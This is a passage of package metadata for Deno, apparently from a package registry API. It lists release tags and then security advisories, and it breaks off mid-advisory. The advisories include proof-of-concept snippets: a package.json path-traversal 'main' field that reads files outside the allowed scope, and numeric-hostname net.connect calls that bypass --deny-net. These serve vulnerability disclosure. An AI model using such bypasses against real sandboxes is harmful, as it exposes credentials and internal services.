":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-29T09:19:07.815Z","dependent_packages_count":5,"downloads":632009,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":6.1427024605159986,"dependent_repos_count":16.5399651664312,"dependent_packages_count":6.221036266331809,"stargazers_count":0.0022405114340766853,"forks_count":0.05750646014130159,"docker_downloads_count":3.229660605608035,"average":5.365518578410403},"purl":"pkg:cargo/deno","advisories":[{"uuid":"GSA_kwCzR0hTQS14MnFjLWNtaDktZjRoZs4ABZDK","url":"https://github.com/advisories/GHSA-x2qc-cmh9-f4hf","title":"Deno: Denial of service via non-ASCII bytes in WebSocket response headers","description":"## Summary\n\nA Deno program that opens a client `WebSocket` connection could be crashed by\nthe remote server. While handling the WebSocket handshake response, Deno parsed\nthe `Sec-WebSocket-Protocol` and `Sec-WebSocket-Extensions` response headers in\na way that assumed their bytes were always printable ASCII. A response header\ncontaining non-visible-ASCII bytes (`0x80`-`0xFF`) caused a panic that aborted\nthe entire Deno process.\n\n## Details\n\nWhen establishing a client WebSocket connection, Deno read the\n`Sec-WebSocket-Protocol` and `Sec-WebSocket-Extensions` headers from the\nserver's `101 Switching Protocols` response and converted them to strings\nwithout handling the failure case. `HeaderValue::to_str()` returns an error for\nany value containing bytes outside the visible-ASCII range, so a header carrying\nsuch bytes triggered an unrecoverable error during conversion.\n\nBecause the client initiates the outbound connection, the handshake response is\nfully controlled by the server. A server that returns bytes such as `0xFF 0xFE`\nin either header could therefore crash any client that connected to it.\n\nThis is purely an availability issue. There is no information disclosure and no\nmemory-safety impact; the only effect is termination of the current process.\n\n## Impact\n\nRemote denial of service. Any Deno application that establishes WebSocket\nconnections to untrusted or potentially-compromised endpoints could be\nterminated by the remote peer. Exploitation requires the victim application to\ninitiate the outbound WebSocket connection. An attacker who controls the\nWebSocket endpoint, or who can man-in-the-middle a plaintext `ws://` connection,\ncould trigger the crash. The effect is confined to crashing the process that\nopened the connection.\n\n## Patch\n\nThe issue is fixed in Deno `2.7.5`. The header values are now parsed with\ngraceful fallbacks: values that cannot be represented as ASCII strings are\nskipped instead of aborting the process. A regression test covers a server that\nreturns non-ASCII bytes in `Sec-WebSocket-Protocol`.\n\nUsers should upgrade to Deno `2.7.5` or later.\n\n## Workarounds\n\nUntil you can upgrade, only connect to trusted WebSocket endpoints and prefer\n`wss://` (TLS) over `ws://`, which prevents a network man-in-the-middle from\ninjecting malicious header bytes into the handshake response.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T18:48:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L","references":["https://github.com/denoland/deno/security/advisories/GHSA-x2qc-cmh9-f4hf","https://github.com/advisories/GHSA-x2qc-cmh9-f4hf"],"source_kind":"github","identifiers":["GHSA-x2qc-cmh9-f4hf","CVE-2026-55517"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T19:00:08.492Z","updated_at":"2026-08-29T17:01:27.474Z","epss_percentage":0.00315,"epss_percentile":0.23669,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MnFjLWNtaDktZjRoZs4ABZDK","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14MnFjLWNtaDktZjRoZs4ABZDK","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.5","vulnerable_version_range":"\u003c= 2.7.4"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MnFjLWNtaDktZjRoZs4ABZDK/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04eHBxLWNqY2YtM3doOc4ABY0p","url":"https://github.com/advisories/GHSA-8xpq-cjcf-3wh9","title":"Deno: Permission Bypass via Unicode Normalization Mismatch on macOS (APFS)","description":"## Summary\n\nDeno's permission system enforces filesystem and execution restrictions by\ncomparing the requested path against the path supplied to `--deny-read`,\n`--deny-write`, `--deny-run`, or `--deny-ffi`. On macOS, that comparison was\ndone at the raw-byte level while the APFS filesystem treats different Unicode\nspellings of the same name as the same file.\n\nThat means a program could reach a denied path by spelling it differently than\nthe deny rule. For example, with `--deny-read=/secrets/passwörter.txt`, a\nscript could still read the file by opening `/secrets/passwo\\u0308rter.txt`\n(NFD instead of NFC), or `/SECRETS/PASSWÖRTER.txt` (different case, since\ndefault APFS volumes are case-insensitive). Other forms include ligature\ncharacters (`ﬁ` vs `fi`, `ﬀ` vs `ff`, …) and German `ß` vs `ss`.\n\nThe denied path and the requested path differed at the byte level, so Deno's\npermission check passed; the kernel then resolved them to the same inode and\nserved the file anyway. The same flaw affected `--deny-write`, `--deny-run`,\nand `--deny-ffi`, which share the same path-comparison code.\n\n## Am I affected?\n\nYou are potentially affected if **all** of the following are true:\n\n1. You run Deno on **macOS** (the issue is specific to APFS path-equivalence\n   rules; Linux and Windows are not affected by this variant).\n2. You rely on `--deny-read`, `--deny-write`, `--deny-run`, or `--deny-ffi`\n   as a security boundary against less-trusted code — a dependency, plugin,\n   or attacker-controlled input.\n3. The protected path contains characters that have alternate Unicode\n   spellings — most commonly accented characters (`é`, `ñ`, `ö`, …), German\n   `ß`, or Latin ligatures — or you rely on case-sensitivity on a default\n   APFS volume.\n\nIf you only run fully trusted code, or your deny rules cover paths that are\npure ASCII with no case-sensitive aliases, you are not exposed to this\nspecific bypass.\n\n## Impact\n\nA program running with broad `--allow-read` (or `--allow-write` /\n`--allow-run` / `--allow-ffi`) but with `--deny-*` carve-outs for specific\npaths could read, write, execute, or load via FFI those denied paths by\nreferring to them through a Unicode- or case-equivalent spelling. The sandbox\nmodel on macOS was weaker than the flags suggested.\n\n## Workaround\n\nIf you cannot upgrade immediately:\n\n- Prefer `--allow-*` allowlists over `--deny-*` denylists. Allow rules match\n   against the original specifier, so an attacker-supplied alternate spelling\n   will not match a path you didn't explicitly grant.\n- Do not rely on case-sensitivity of paths on macOS for security boundaries;\n   default APFS volumes are case-insensitive.\n\n## Fix\n\nOn macOS, Deno now normalizes both the deny-rule path and the requested path\nto NFC and applies Unicode case folding before comparing them. This matches\nhow APFS resolves paths at the inode level, so byte-different but equivalent\nspellings are now rejected by the same deny rule.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-16T19:11:52.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-8xpq-cjcf-3wh9","https://nvd.nist.gov/vuln/detail/CVE-2026-49401","https://github.com/advisories/GHSA-8xpq-cjcf-3wh9"],"source_kind":"github","identifiers":["GHSA-8xpq-cjcf-3wh9","CVE-2026-49401"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.612Z","epss_percentage":0.00197,"epss_percentile":0.094,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04eHBxLWNqY2YtM3doOc4ABY0p","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04eHBxLWNqY2YtM3doOc4ABY0p","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.14","vulnerable_version_range":"\u003c= 2.7.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04eHBxLWNqY2YtM3doOc4ABY0p/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05Njh3LXhmcXctdnA5cc4ABY0o","url":"https://github.com/advisories/GHSA-968w-xfqw-vp9q","title":"Deno: BYONM module resolution allows `package.json` main path traversal to bypass `--allow-read` restrictions","description":"## Summary\n\nWhen Deno was run in BYONM mode (`nodeModulesDir: \"manual\"`), the module resolver did not validate that a package's resolved entrypoint stayed within its `node_modules/\u003cpkg\u003e/` directory. A malicious `package.json` whose `main` field contained `..` segments was able to resolve to an arbitrary path on disk, and the resolver then read that file without consulting the `--allow-read` allowlist. This let a `require(\"evil-pkg\")` call return the contents of a file that a direct `Deno.readTextFileSync(...)` call would have been blocked from reading.\n\n## Details\n\nIn BYONM mode, Deno resolved npm packages directly from a user-managed `node_modules` tree. Resolution of `require(\"pkg\")` proceeded by reading `pkg/package.json`, taking the `main` field, joining it to the package directory, and loading the result as a module.\n\nThe path joined from `main` was not constrained to the package root. A `package.json` such as:\n\n```json\n{ \"main\": \"../../../secret.json\" }\n```\n\nresolved to `node_modules/pkg/../../../secret.json`, escaping `node_modules` entirely. The BYONM permission check accepted any path that contained a `node_modules` component and did not reject `..` traversal, so the resolved path was loaded without a read-permission check.\n\nBecause resolution loaded JSON entrypoints by parsing their contents and returning them through `require`, this exposed the contents of arbitrary `.json` files reachable by the OS user to the requiring code, even when `--allow-read` had been narrowed to a specific directory.\n\nThe same file accessed via `Deno.readTextFileSync` was correctly blocked. The bug was that module resolution did not enforce the same read-permission boundary that the filesystem APIs enforced.\n\n## Proof of concept\n\nThe reporter supplied a self-contained PoC. Layout:\n\n```\n/tmp/deno_byonm_poc/\n├── app/\n│   ├── deno.json            (BYONM enabled)\n│   ├── exploit.ts           (require(\"evil-pkg\"))\n│   └── node_modules/\n│       └── evil-pkg/\n│           └── package.json (main: \"../../../secret.json\")\n└── secret.json              (outside --allow-read scope)\n```\n\nRun:\n\n```bash\ndeno run --no-prompt --allow-read=/tmp/deno_byonm_poc/app exploit.ts\n```\n\nObserved:\n\n- `Deno.readTextFileSync(\"/tmp/deno_byonm_poc/secret.json\")` — blocked, as\n  expected.\n- `require(\"evil-pkg\")` — returned the parsed contents of `secret.json`,\n  bypassing the read allowlist.\n\nA control run with BYONM disabled (`--no-config`) blocked the `require` call.\n\n## Impact\n\nThe vulnerability allowed a hostile npm package installed under a BYONM `node_modules` to read JSON files outside the directories granted via `--allow-read`, up to the privileges of the OS user running Deno. In practice this exposed configuration and credential files (`.env.json`, cloud credentials, package lockfiles, etc.) that the user had deliberately excluded from the read scope.\n\nThe vulnerability did not grant any capability beyond what the OS user already held, did not affect runs that granted unrestricted `--allow-read`, and required the user to have installed and then required a hostile package, i.e. an existing supply-chain compromise. The reason it warranted a security advisory rather than a routine bug fix is that Deno's permission model\npromised that `--allow-read=\u003cscope\u003e` was a hard boundary *even over untrusted npm code*, and that promise was broken.\n\nNot affected:\n\n- Runs without BYONM (default npm resolution went through a separate code\n  path that rejected the traversal).\n- Runs with full `--allow-read` (no boundary to bypass).\n- Non-JSON entrypoints, in practice — `.js`/`.cjs`/`.mjs` targets executed\n  rather than exposing file contents, which already implied attacker code\n  execution within the granted permission set.\n\n## Workarounds\n\nUsers on unpatched versions could mitigate by:\n\n- Avoiding BYONM mode (`nodeModulesDir: \"manual\"`) for projects that depended\n  on untrusted packages.\n- Auditing `package.json` `main` fields in `node_modules` for `..` segments\n  before running.\n- Granting `--allow-read` only when the read scope already covered every file\n  the OS user could see (in which case there was no boundary to bypass and no\n  additional exposure).","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:11:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-968w-xfqw-vp9q","https://nvd.nist.gov/vuln/detail/CVE-2026-49406","https://github.com/advisories/GHSA-968w-xfqw-vp9q"],"source_kind":"github","identifiers":["GHSA-968w-xfqw-vp9q","CVE-2026-49406"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.613Z","epss_percentage":0.00176,"epss_percentile":0.07085,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05Njh3LXhmcXctdnA5cc4ABY0o","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05Njh3LXhmcXctdnA5cc4ABY0o","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.12","vulnerable_version_range":"\u003c= 2.7.11"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05Njh3LXhmcXctdnA5cc4ABY0o/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12OGZ3LTg1cjgtNW0yM84ABY0n","url":"https://github.com/advisories/GHSA-v8fw-85r8-5m23","title":"Deno: Node TCPWrap numeric hostname aliases bypass --deny-net resolved-IP deny checks","description":"## Summary\n\nDeno's network permission model is designed so that `--deny-net` rules apply to the **resolved IP address** of a destination, not just the literal string supplied by the caller. That means `--deny-net=127.0.0.1` (or `--deny-net=127.0.0.0/8`) is expected to block any attempt to reach loopback, regardless of how the hostname is spelled.\n\nOn affected versions, the Node.js compatibility TCP path checked the permission against the **original hostname string** before resolution and then did not re-check after resolution. A caller could therefore pass a numeric alias of an IP address (for example the decimal integer `2130706433` or the hex form `0x7f000001`, both of which resolve to `127.0.0.1`) and reach the denied destination through `node:net.connect` or `node:http.request`'s `{ host, port }` options form.\n\nThe native `Deno.connect()`, `fetch()`, and URL-string variants of `node:http.request(\"http://...\")` were not affected, because they either re-checked permissions after resolution or normalized the hostname through the URL parser before checking.\n\n## Proof of concept\n\nRun on Deno `2.7.14`, with a local TCP listener on `127.0.0.1:\u003cPORT\u003e`:\n\n```js\nimport net from \"node:net\";\n\n// --allow-net + --deny-net=127.0.0.0/8\n// (or even --deny-net=127.0.0.1:\u003cPORT\u003e)\nnet.connect({ host: \"2130706433\", port: PORT });     // CONNECTED ❌\nnet.connect({ host: \"0x7f000001\", port: PORT });     // CONNECTED ❌\nnet.connect({ host: \"127.0.0.1\",  port: PORT });     // denied ✅\n```\n\nThe same primitive reached the loopback HTTP listener through `node:http` when the destination was passed as options rather than as a URL string:\n\n```js\nimport http from \"node:http\";\n\n// options-form host — bypasses the deny rule on affected versions\nhttp.request({ hostname: \"2130706433\", port: PORT, path: \"/\" }).end();\n\n// URL-string form — correctly denied (URL parser normalizes the host)\nhttp.request(`http://2130706433:${PORT}/`).end();\n```\n\nThe server-side log showed the bypassed requests arriving from `127.0.0.1` with the numeric alias preserved in the `Host` header.\n\n## Impact\n\nA program that intentionally allows broad outbound network access but uses `--deny-net` to carve out protected destinations, typically loopback, private/internal ranges, or cloud-instance metadata IPs, could be made to reach those denied destinations from less-trusted code (a dependency, plugin, or attacker-controlled input) that funnels through `node:net.connect({ host })` or `node:http.request({ hostname })`.\n\nThe CVSS vector reflects this as a local-attack-vector, permissions-required confidentiality impact: the attacker needs to be able to run code inside the Deno process, and the demonstrated primitive is \"reach an explicitly denied IP.\" It does not by itself exfiltrate data or execute code; the further impact depends on what the now-reachable endpoint exposes.\n\nThe confirmed scope is **IPv4 numeric hostname 